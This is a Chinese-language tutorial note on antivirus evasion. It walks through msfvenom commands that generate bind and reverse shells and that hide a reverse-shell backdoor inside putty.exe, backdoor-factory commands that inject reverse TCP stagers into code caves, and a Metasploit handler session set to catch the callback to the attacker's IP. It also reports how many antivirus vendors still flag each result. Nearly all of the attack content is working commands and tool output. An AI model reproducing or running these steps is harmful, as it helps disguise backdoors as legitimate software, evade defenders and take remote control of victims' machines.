免殺技術

與防病毒廠商共享信息shell

VirusTotalwindows

  https://www.virustotal.com/zh-cn安全

VirScantcp

  https://virscan.org網站

黑產在線查殺引擎ui

  https://nodistribute.com編碼

  http://viruscheckmate.com掃描網站安全性3d

  http://onlinelinkscan.comcode

 

使用msf編碼模塊生成後門blog

  msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe       21個廠商報毒

  增長編碼模塊

  msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe  20個廠商報毒

   使用編碼後效果並不明顯,仍是不少廠商報毒

 

使用模板程序隱藏後門,效果比較好

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe

  將後門綁定到putty中,這裏用的是反彈shell 注意參數lhost地址填寫的是攻擊者的IP地址,綁定後putty會報廢,若是不想破壞使用 -k 參數

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe

  8個廠商報毒

 

+

payload: 在目標系統執行的代碼或指令,使得獲取shell

shellcode : 獲取shell的code

 

 

shell             後門程序

reverser_tcp 反彈shell

bind_tcp      正向shell

meterpreter 更高級的shell,集成了不少腳本,更容易使用

 【meterpreter命令】

    getuid 當前用戶信息

    getsystem 提權

    help 查看幫助

    screenshot

 

 

由於msf知名度太大了,作出的免殺指紋早已被殺毒廠商收錄了

 

kali存放着windows下的執行程序目錄

/usr/share/windows-binaries/

 

shellter 每次生成的後門程序代碼都不一樣,動態變化的特徵,難以用指紋匹配

 

後門利用

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.137.128
lhost => 192.168.137.128
msf exploit(multi/handler) > set lport 444
lport => 444
msf exploit(multi/handler) >

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.137.128  yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.137.128:444

 

 

亂碼將終端編碼改爲 gbk 或者 gb2312

shllter

veil-framework

 

backdoor生成的後門曾經很騷,沒有一個殺軟報毒,在黑帽大會秀了一波,如今不行了,不推薦使用

backdoor-factory 利用代碼洞注入後門,不改變體積 code cave

backdoor-factory -f putty.exe -S      檢查是否支持注入後門

backdoor-factory -f putty.exe -c -l 100    檢查大於100字節的代碼洞數量

backdoor-factory -f putty.exe -s show    查看哪些payload能夠用

 

普通注入模式(體積會變大,直接在程序後面加代碼)

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

 

大小對比

 

單代碼洞注入(體積不會變,須要選擇代碼洞)

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

最好選擇代碼洞比較大的,不然容易致使溢出,因此這裏選擇1,這裏大小反而變小了,理論上應該不變的

 

使用的時候360殺軟報毒了。在線監測有23個廠商報毒,效果不怎樣,0day似的

 

多代碼洞注入模式

backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J

要選屢次代碼洞,儘可能選大的,否則要選不少次

 

利用:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LPORT 444

set LHOST 192.168.137.129

相關文章
相關標籤/搜索